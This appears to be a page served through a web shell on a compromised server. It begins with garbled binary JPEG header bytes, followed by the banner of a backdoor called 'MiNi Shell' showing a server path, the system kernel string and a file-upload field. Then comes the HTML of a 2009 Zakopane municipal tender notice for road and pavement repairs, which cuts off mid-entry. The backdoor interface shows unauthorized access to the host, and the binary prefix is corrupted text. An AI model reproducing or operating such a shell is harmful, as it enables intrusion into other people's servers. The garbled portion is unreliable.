JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090227/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090227/43596-N-2009.html

<p class="kh_header"><b>Zakopane: ZP/341/9/09  bieżące wykonywanie remontów ulic i wszystkich elementów pasa drogowego dróg publicznych gminnych dla których zarządcą jest Burmistrz Miasta Zakopane</b><br>
<b>Numer ogłoszenia: 43596 - 2009; data zamieszczenia: 27.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/341/9/09  bieżące wykonywanie remontów ulic i wszystkich elementów pasa drogowego dróg publicznych gminnych dla których zarządcą jest Burmistrz Miasta Zakopane.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia jest sukcesywne  wykonywanie remontów ulic i elementów pasa drogowego dróg publicznych gminnych dla których zarządcą jest Burmistrz Gminy Miasta Zakopane.
Zakres  zlecanych prac będzie ustalany przez zamawiającego sukcesywnie podczas wspólnych objazdów ulic z wykonawcą z którym zostanie podpisana umowa  i inspektorem  nadzoru. 
Zadanie I - roboty budowlane związane z wykonywaniem remontów bieżących 
                 nawierzchni jezdni oraz elementów pasa drogowego dróg 
                 publicznych    gminnych dla których   zarządcą jest Burmistrz Gminy 
                  Miasta Zakopane 
        
Zakres robót  zadania I obejmuje:

-	frezowanie nawierzchni,
-	wyrównanie nawierzchni,
-	wykonanie nakładki z asfaltobetonu grubości 6 cm,
-	remont nawierzchni asfaltobetonem na gorąco,
-	remont nawierzchni asfaltobetonem na zimno,
-	remont nawierzchni tłuczniowej,
-	remont nawierzchni modyfikowaną emulsją i grysami,
-	regenerację nawierzchni bitumicznej modyfikowaną emulsją i grysami,
-	wykonanie nowych rowów,
-	ułożenie rur pod zjazdami,
-	regulację pionowa studni, wraz z odbudową nawierzchni,
-	regulację pionową studni z wymianą włazu na właz z koszem wraz z odbudową 
-	nawierzchni,
-	przebudowa studni wraz z wymianą włazu na właz z koszem,
-	wykonanie studni rewizyjnych,
-	uzupełnienie poboczy grubości 6 cm
-	ścięcie zawyżonych poboczy,
-	montaż poręczy sprężystych,
-	demontaż poręczy sprężystych,
-	demontaż słupków odgradzających,
-	 inne nie wyszczególnione prace konieczne do wykonania przedmiotu 
         zamówienia które będą rozliczane według składników cenotwórczych 
         podanych w ofercie wykonawcy


Zadanie II - roboty budowlane związane z wykonywaniem remontów bieżących 
                chodników  w ciągu dróg publicznych gminnych dla których  zarządcą  
                 jest  Burmistrz Gminy Miasta Zakopane

  Zakres robót  zadania II obejmuje:

-	ułożenie krawężników betonowych,
-	ułożenie krawężników granitowych,
-	regulacja krawężników granitowych,
-	ułożenie obrzeży chodnikowych,
-	wykonanie w-wy odcinającej z piasku grubości 8 cm,
-	wykonanie dolnej w-wy podbudowy grubości 20 cm,
-	wykonanie górnej w-wy podbudowy grubości 15 cm,
-	wykonanie nawierzchni chodnika z kostki brukowej na podsypce piaskowej,
-	uzupełnienie poboczy grubości 6 cm
-	demontaż słupków odgradzających,
-	montaż słupków typu AMSTERDAM
-	montaż słupków odgradzających ocynkowanych,
-	malowanie barier ochronnych,
-	inne nie wyszczególnione prace konieczne do wykonania przedmiotu 
        zamówienia które będą rozliczane według składników cenotwórczych podanych  
         w ofercie wykonawcy

Zamawiający  dopuszcza składania ofert częściowych na jedno wybrane zadanie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.11.11.00-9, 45.23.33.30-1, 45.23.32.23-8, 45.23.32.90-8, 45.23.32.22-1, 45.23.20.00-2, 45.22.11.19-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Każdy wykonawca jest zobowiązany wnieść wadium przetargowe w wysokości ;
Zadanie I -  75.000,00  ( słownie: siedemdziesiąt pięć tysięcy złotych)
Zadanie II - 30.000,00  zł ( słownie; trzydzieści tysięcy  złotych)

2.	Wadium może być wnoszone w jednej lub w kilku  następujących formach: 
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
2) poręczeniach bankowych;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 lit. b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn.zm.).

3.	Wadium przetargowe w  pieniądzu należy wnieść  przelewem na konto Urzędu Miasta Zakopane w PEKAO S.A. w Zakopanem nr: 85124047481111000048718666 Wadium powinno znajdować się na koncie zamawiającego najpóźniej w terminie składania ofert tj.23 marca   2009r. do godz.  12°°
Wadium wnoszone w pozostałych formach należy złożyć w postaci oryginału, najpóźniej w terminie składania ofert tj.23 marca 2009r.do godz. 12°° w  Biurze  ds. zamówień publicznych pok. nr 8 parter.
        
  UWAGA! Nie wolno oryginałów tych dokumentów wkładać do oferty.

4.	ZWROT WADIUM : 
1) Zamawiający zwraca niezwłocznie wadium, jeżeli:
a) upłynął termin związania ofertą;
b) zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania umowy.
 c) zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
      2)  Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy: 
a) który wycofał ofertę przed upływem terminu składania ofert;
b) który został wykluczony z postępowania;
c) którego oferta została odrzucona.
3)   Zamawiający żąda  ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie ppkt 2 lit. b i c  jeżeli w wyniku  ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez zamawiającego 
4) Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.

      Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na    wezwanie, o którym mowa w art. 26 ust. 3ustawy  nie złożył dokumentów lub oświadczeń, o     których mowa w art. 25 ust. 1 ustawy,  lub pełnomocnictw, chyba że udowodni, że wynika to z   przyczyn nieleżących po jego stronie. 
5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki zawarte w art.22 ust.1 ustawy Prawo zamówień publicznych tj.:
Zadanie I - roboty budowlane związane z wykonywaniem remontów bieżących 
                 nawierzchni jezdni oraz elementów pasa drogowego dróg publicznych 
                 gminnych dla których   zarządcą jest Burmistrz Gminy Miasta Zakopane 


1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;

2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią  pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia 

-      wykonawca musi wykazać ,że w okresie ostatnich 5 lat przed dniem wszczęcia niniejszego postępowania , a jeżeli okres  prowadzenia działalności  jest krótszy- w tym okresie wykonał co najmniej 2 roboty o tożsamym charakterze z przedmiotem zamówienia tj.: każda  robota polegająca na  wykonywaniu  minimum: 5 tyś. m2 - odnowa nawierzchni; 2 tyś. m2 - remont cząstkowy nawierzchni; 1000 mb - wykonanie odwodnienia; 800 mb - umocnienie poboczy.

         - wykonawca musi wykazać ,że dysponuje lub będzie dysponował  :
1)wytwórnią mas bitumicznych  lub możliwością  zakupu masy bitumicznej w ilości nie mniejszej niż 900 Mg,
2) rozściełaczem  mas bitumicznych z elektronicznym sterowaniem, z podgrzewaną deską ze wstępnym systemem zagęszczania szer. od 3,5 do 7,5 m,
3)  minimum dwoma  walcami  stalowymi  o ciężarze przekraczającym 8 Mg,
4)  1 walcem  ogumionym
- wykonawca musi wykazać ,że dysponuje lub będzie dysponował osobami  posiadającymi odpowiednie kwalifikacje potrzebne do prawidłowego wykonania zamówienia w tym musi wykazać ,że  dysponuje lub będzie dysponował   kierownikami budowy o specjalnościach drogowo - mostowych i  legitymujących  się aktualną przynależnością do   Izby  Inżynierów Budownictwa

3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
    - wykonawca musi wykazać się posiadaniem  środków     finansowych lub zdolnością      kredytową w wysokości nie mniejszej niż  500.000,00  zł
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ust.1 i 2 ustawy Prawo zamówień publicznych
W zakresie zadania II - roboty budowlane związane z wykonywaniem remontów bieżących  chodników  w ciągu dróg publicznych gminnych dla których  zarządcą jest  Burmistrz Gminy Miasta Zakopane


1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;

     2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią  pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia 

- wykonawca musi wykazać ,że w okresie ostatnich 5 lat przed dniem wszczęcia niniejszego postępowania , a jeżeli okres  prowadzenia działalności  jest krótszy- w tym okresie wykonał co najmniej 2 roboty  każda o tożsamym charakterze z przedmiotem zamówienia tj.:  każda robota polegająca   na min 2000 m2  remontu lub  wykonania  nowej  nawierzchni chodników 

         - na potwierdzenie dysponowania potencjałem technicznym wykonawca ma złożyć w druku oferty oświadczenie, że dysponuje lub będzie dysponował  sprzętem  niezbędnym do prawidłowego wykonania zamówienia

- wykonawca musi wykazać ,że dysponuje lub będzie dysponował osobami  posiadającymi odpowiednie kwalifikacje potrzebne do prawidłowego wykonania zamówienia w tym musi wykazać ,że  dysponuje lub będzie dysponował  kierownikiem budowy posiadającym uprawnienia ogólno-budowlane i  legitymującym się aktualną przynależnością do   Izby  Inżynierów Budownictwa

3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
    - wykonawca musi wykazać się posiadaniem  środków     finansowych lub zdolnością  kredytową w wysokości nie mniejszej niż  200.000,00  zł
4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ust.1 i 2 ustawy Prawo zamówień publicznych


Ocena spełnienia powyższych warunków będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.aktualny odpis z właściwego rejestru , albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru , lub zgłoszenie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2. aktualne  zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu  składania ofert;
3.aktualną informację  z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu    składania ofert;
4.aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
5.	podpisane oświadczenie o spełnianiu warunków, stanowiące załącznik nr 2 do  siwz,

6.	 na potwierdzenie wymaganego doświadczenia wykonawca zobowiązany jest załączyć     do    oferty  wykaz ( należy wypełnić   załącznik nr 5    do   siwz) 
            wykonanych w   okresie ostatnich 5 lat przed dniem wszczęcia niniejszego  
            postępowania , a jeżeli okres  prowadzenia działalności  jest krótszy- w tym okresie) który będzie potwierdzał, że wykonawca  w zakresie :
-	Zadania I  - wykonał  co najmniej 2 roboty o tożsamym charakterze z przedmiotem zamówienia tj.: każda  robota polegająca na  wykonywaniu  minimum: 5 tyś. m2 - odnowa nawierzchni; 2 tyś. m2 - remont cząstkowy nawierzchni; 1000 mb - wykonanie odwodnienia; 800 mb - umocnienie poboczy.

         Zadania II -  wykonał co najmniej 2 roboty  każda o tożsamym charakterze z 
         przedmiotem zamówienia tj.:  każda robota polegająca   na min 2000 m2  remontu lub   wykonania  nowej  nawierzchni chodników   

Wykonawca zobowiązany jest do powyższego wykazu załączyć dokumenty ( np.: referencje) potwierdzające, że   podane  w wykazie  roboty  zostały wykonane należycie. 

7 .wypełniony druk oferty stanowiący załącznik nr 3 do  siwz(wykonawca może założyć ofertę na własnym formularzu, lecz jego  treść i układ muszą być zgodne z formularzem załączonym do siwz).

8 . wykaz osób( należy wypełnić załącznik nr 6 do  siwz) , którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności  lub  pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa , wykonawca wskazał osoby, którymi będzie dysponował.
 Z wykazu lub  pisemnego zobowiązania innego podmiotu musi wynikać ,że:
W zakresie zadania I -  że  dysponuje lub będzie dysponował   kierownikami budowy o specjalnościach drogowo - mostowych i  legitymujących  się aktualną przynależnością do   Izby  Inżynierów Budownictwa

 
W zakresie  zadania II - kierownikiem budowy  będzie osoba posiadająca uprawnienia  ogólno- budowlane i  legitymująca się aktualną przynależnością do   Izby  Inżynierów Budownictwa

 Wykonawca zobowiązany jest do powyższego wykazu załączyć kserokopie uprawnień kierownika budowy wraz z kserokopią jego aktualnej przynależności do właściwej Izby Inżynierów Budownictwa. 


9. na  potwierdzenia  znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zamawiający wymaga  załączenia do oferty  informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków     finansowych lub zdolność kredytową wykonawcy w wysokości nie mniejszej niż:
Dla Zadania I -  500.000,-   zł ( słownie: pięćset tysięcy   złotych ) wystawionej nie   wcześniej niż 3   miesiące przed upływem terminu składania ofert,
  Dla zadania II - 200.000,-   zł ( słownie: dwieście  tysięcy   złotych ) wystawionej nie   wcześniej niż 3   miesiące przed upływem terminu składania ofert,

10. na potwierdzenie dysponowania potencjałem technicznym koniecznym do       
     prawidłowego wykonania zamówienia wykonawca zobowiązany jest do oferty  
           załączyć  wykaz   sprzętu - należy wypełnić załącznik nr   9 do  siwz
Z wykazu lub  pisemnego zobowiązania innego podmiotu musi wynikać ,że:
W zakresie zadania I -   wykonawca dysponuje lub będzie dysponował  
1)wytwórnią mas bitumicznych  lub możliwością  zakupu masy bitumicznej w ilości nie mniejszej niż 900 Mg,
2) rozściełaczem  mas bitumicznych z elektronicznym sterowaniem, z podgrzewaną deską ze wstępnym systemem zagęszczania szer. od 3,5 do 7,5 m,
3)  minimum dwoma  walcami  stalowymi  o ciężarze przekraczającym 8 Mg,
 4)  1 walcem  ogumionym
 W zakresie zadania II -   wykonawca  musi  złożyć oświadczenie w druku oferty  ,że dysponuje lub będzie dysponował   sprzętem niezbędnym do prawidłowego wykonania zamówienia.

11.  wykonawca do oferty ma załączyć   wypełniony przedmiar robót ( na  wybrane przez niego zadanie) oraz wypełniony formularz ofertowo-cenowy  dla  wybranego zadania ,stanowiący załącznik do druku oferty.  


Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w :
	1. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pktXIII siwz
	1)	pkt 1, 2 i 4 - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
	2)	pkt 3 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.

2. Dokumenty, o których mowa w ust. 1 pkt 1 lit. a i c oraz pkt 2, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w ust. 1 pkt 1 lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu  składania ofert.
3. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Przepis ust. 2 stosuje się odpowiednio

UWAGA! 
Dokumenty mogą być przedstawione w formie kopii  (kserokopii)  poświadczonych za zgodność z oryginałem  przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Przetargi - postępowania poniżej progów unijnych.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Drogownictwa i Transportu ( pok. 216)
Urząd Miasta Zakopane
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2009 godzina 12:00, miejsce: Biuro ds zamówień publicznych (pok.8)
Urząd Miasta Zakopane
ul. Kościuszki 13
34-500 Zakopane.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> roboty budowlane związane z wykonywaniem remontów bieżących nawierzchni jezdni oraz elementów pasa drogowego dróg publicznych  gminnych dla których   zarządcą jest Burmistrz Gminy Miasta Zakopane.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie I - roboty budowlane związane z wykonywaniem remontów bieżących 
                 nawierzchni jezdni oraz elementów pasa drogowego dróg publicznych 
                gminnych dla których   zarządcą jest Burmistrz Gminy Miasta Zakopane 
        
Zakres robót  zadania I obejmuje:

-	frezowanie nawierzchni,
-	wyrównanie nawierzchni,
-	wykonanie nakładki z asfaltobetonu grubości 6 cm,
-	remont nawierzchni asfaltobetonem na gorąco,
-	remont nawierzchni asfaltobetonem na zimno,
-	remont nawierzchni tłuczniowej,
-	remont nawierzchni modyfikowaną emulsją i grysami,
-	regenerację nawierzchni bitumicznej modyfikowaną emulsją i grysami,
-	wykonanie nowych rowów,
-	ułożenie rur pod zjazdami,
-	regulację pionowa studni, wraz z odbudową nawierzchni,
-	regulację pionową studni z wymianą włazu na właz z koszem wraz z odbudową 
-	nawierzchni,
-	przebudowa studni wraz z wymianą włazu na właz z koszem,
-	wykonanie studni rewizyjnych,
-	uzupełnienie poboczy grubości 6 cm
-	ścięcie zawyżonych poboczy,
-	montaż poręczy sprężystych,
-	demontaż poręczy sprężystych,
-	demontaż słupków odgradzających,
-	 inne nie wyszczególnione prace konieczne do wykonania przedmiotu 
         zamówienia które będą rozliczane według składników cenotwórczych   
         podanych  w ofercie wykonawcy.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.11.11.00-9, 45.23.33.30-1, 45.23.32.23-8, 45.23.32.90-8, 45.23.32.22-1, 45.23.20.00-2, 45.22.11.19-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> roboty budowlane związane z wykonywaniem remontów bieżących chodników  w ciągu dróg publicznych gminnych dla których  zarządcą jest  Burmistrz Gminy Miasta Zakopane.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie II - roboty budowlane związane z wykonywaniem remontów bieżących 
                       chodników  w ciągu dróg publicznych gminnych dla których   
